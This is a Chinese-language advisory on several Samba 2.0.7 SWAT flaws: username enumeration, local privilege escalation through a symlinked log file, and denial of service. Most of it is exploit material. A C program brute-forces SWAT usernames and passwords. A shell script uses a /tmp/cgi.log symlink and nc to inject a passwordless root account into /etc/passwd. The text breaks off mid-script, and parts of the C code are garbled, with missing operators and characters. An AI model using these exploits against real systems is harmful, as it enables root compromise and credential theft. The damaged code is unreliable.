受影響的版本: Samba 2.0.7 不受影響的版本: Samba 2.0.9 漏洞描述: swat是Samba 2.0以上服務器中包含的一個服務進程,它使管理員可以通過 web 界面對samba服務器進行配置管理.在Samba 2.0.7的swat服務中存在多個漏洞, 嚴重危害到系統安全. (1)可能洩漏系統用戶名和密碼. 當用戶登錄到swat頁面時,swat會提示用戶輸入用戶名和密碼.當用戶輸入錯誤 的用戶名時,swat會給出信息: 401 Bad Authorization username/passWord must be supplied 但是當用戶輸入正確的用戶名但密碼錯誤時,swat將會掛起兩秒,然後返回信息: 401 Authorization Required You must be authenticated to use this service. 這樣攻擊者通過對swat返回的不同消息,可以獲得系統中的用戶名,從而可以進 一步獲取該用戶的密碼,由於swat卻省情況下沒有打開日志功能,因此攻擊過程 不會被紀錄;如果swat打開了日志功能的話,將直接導致漏洞2的發生. ( 測試代碼一 ) (2)本地用戶權限提升 swat默認情況下沒有啟用日志功能.如果啟用了日志功能,swat沒有檢查日志文 件是否已經存在,就覆蓋寫入來自客戶端用戶的任意輸入內容,這樣本地的惡意 用戶可以通過臨時文件的競爭改寫系統中的重要文件. 示例:
[email protected]$ ln -s /etc/passwd /tmp/cgi.log #首先建立一個連接
[email protected]$ telnet localhost 901 #然後登錄到901(swat)端口: toor::0:0::/:/bin/bash #輸入如上內容,切斷連接 ctrl^]:quit
[email protected]$ cat /etc/passwd #查看/etc/passwd文件 [Date: Mon, 31 Oct 2000 22:19:58 GMT localhost.localdomain (127.0.0.1)] toor::0:0::/:/bin/bash
[email protected]$ su 惡意用戶將獲得root權限。 ( 測試程序二 ) (3)拒絕服務攻擊 在登錄時輸入不正確的URL,例如 hostname:901?badfile 提供不正確的用戶名和口令, swat將提示: Authentication Required 然後inetd將重啟swat.如果系統使用netscape浏覽器,netscape將立即重試url,最終導 致inetd關閉swat服務很長一段時間. 測試方法:(以下的程序或方法可能具有攻擊性,如用於非法用途,後果自負!) ---------------------------* swat_test1.c *---------------------------------- #include stdio.h #include netdb.h #include stdlib.h #include string.h #include sys/socket.h #include sys/types.h #include netinet/in.h #include arpa/inet.h #include signal.h #include errno.h #include fcntl.h #define SWAT_PORT 901 #define MAX_NAME_SIZE 16 #define MAX_PASS_SIZE 16 #define CHECK_PASSWORD "centerfield" #define USER_AGENT "super-hyper-alpha-pickle-2000" strUCt VALID_NAMES { char *name; struct VALID_NAMES *next; }; struct VALID_NAMES *add_to_names(struct VALID_NAMES *list, char *name) { list->name=(char *)malloc(MAX_NAME_SIZE); memcpy(list->name, name, MAX_NAME_SIZE); list->next=(struct VALID_NAMES *)malloc(sizeof(struct VALID_NAMES)); list=list->next; memset(list, 0, sizeof(struct VALID_NAMES)); return(list); } void chop(char *str) { int x; for(x=0;str[x]!=;x++) if(str[x]== ) { str[x]=; return; } return; } char *base64_encode(char *str) { char *b64="ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/="; int x, y; unsigned char *output; output=(char *)malloc(strlen(str)*2); memset(output, 0, strlen(str)*2); for(x=0, y=0;x> 2; output[y+1] = str[x] > 2; output[y+1] = output[y+1] (str[x+1] >> 4); output[y+2] = str[x+1] > 2; output[y+2] = output[y+2] (str[x+2] >> 6); output[y+3] = str[x+2] > 2; } if(strlen(str)%3 == 1) { output[y]=str[x] >> 2; output[y+1]=str[x] > 2; output[y+2]=64; output[y+3]=64; } if(strlen(str)%3 == 2) { output[y]=str[x] >> 2; output[y+1]=str[x] > 2; output[y+1]=output[y+1] (str[x+1] >> 4); output[y+2]=str[x+1] > 2; output[y+3]=64; } for(x=0 ; output[x] != 0 ; x++) output[x] = b64[output[x]]; output[x+1]=; return(output); } int check_user(char *name, char *pass, struct hostent *he) { char buf[8192]=""; char buf2[1024]=""; int s; struct sockaddr_in s_addr; memset(buf, 0, sizeof(buf)); memset(buf2, 0, sizeof(buf2)); s_addr.sin_family = PF_INET; s_addr.sin_port = htons(SWAT_PORT); memcpy((char *) &s_addr.sin_addr, (char *) he->h_addr, sizeof(s_addr.sin_addr)); if((s=socket(PF_INET, SOCK_STREAM, IPPROTO_TCP)) == -1) { fprintf(stderr, "cannot create socket "); exit(-1); } if(connect(s, (struct sockaddr *) &s_addr, sizeof(s_addr))==-1) { fprintf(stderr, "cannot connect "); exit(-1); } chop(name); chop(pass); sprintf(buf2, "%s:%s", name, pass); sprintf(buf, "GET / HTTP/1.0 " "Connection: Keep-Alive " "User-Agent: %s " "Authorization: Basic %s ", USER_AGENT, base64_encode(buf2)); if(send(s, buf, strlen(buf), 0) < 1) { perror("send: "); exit(1); } memset(buf, 0, sizeof(buf)); if(recv(s, buf, sizeof(buf), 0) < 1) { perror("recv: "); exit(1); } buf[sizeof(buf)]=; if(strstr(buf, "HTTP/1.0 401 Authorization Required") != NULL) { close(s); return 1; } else if(strstr(buf, "HTTP/1.0 401 Bad Authorization") != NULL) { close(s); return 0; } else if(strstr(buf, "HTTP/1.0 200 OK") != NULL) { close(s); return 2; } else { printf("Unknown result: %s ", buf); exit(1); } } void usage(void) { printf(" Usage: flyswatter [-a] -t target -n namefile -p passwordfile "); printf(" -a: Do not verify that users exist. "); exit(1); } int main(int argc, char** argv) { int x, y, z; int s; char buf[MAX_NAME_SIZE]=""; FILE *pfile, *nfile; struct hostent *he; struct VALID_NAMES *valid_names; struct VALID_NAMES *list_walk; int tryall=0; char target[1024]=""; char namefile[512]=""; char passwordfile[512]=""; valid_names=(struct VALID_NAMES *)malloc(sizeof(struct VALID_NAMES)); list_walk=valid_names; memset(valid_names, 0, sizeof(struct VALID_NAMES)); if(argcnext != 0) { fseek(pfile, 0, SEEK_SET); while(fgets(buf, sizeof(buf), pfile)!=NULL) { if(check_user(valid_names->name, buf, he)==2) printf("valid username/password: %s:%s ", valid_names->name, buf); } valid_names=valid_names->next; } printf("Finished. "); exit(0); } ------------------------------* swat_test2.sh---------------------------------- #!/bin/sh # swat for samba 2.0.7 compiled with cgi logging eXPloit # discovered by miah
[email protected] # exploit by optyx
[email protected] if [ -f /tmp/cgi.log ]; then if [ `rm -f /tmp/cgi.log` ]; then echo "/tmp/cgi.log exists and cannot be deleted" exit fi fi echo "backing up /etc/passwd" cp -pd /etc/passwd /tmp/.bak touch -r /etc/passwd /tmp/.bak ln -s /etc/passwd /tmp/cgi.log echo "connecting to swat" echo -e "uberhaxr::0:0:optyx r0x y3r b0x:/:/bin/bash " nc -w 1 localhost swat if [ `su -l uberhaxr -c "cp /bin/bash /tmp/.swat"` ]; then echo "exploit failed" rm /tmp/.bak rm /tmp/cgi.log exit fi su -l
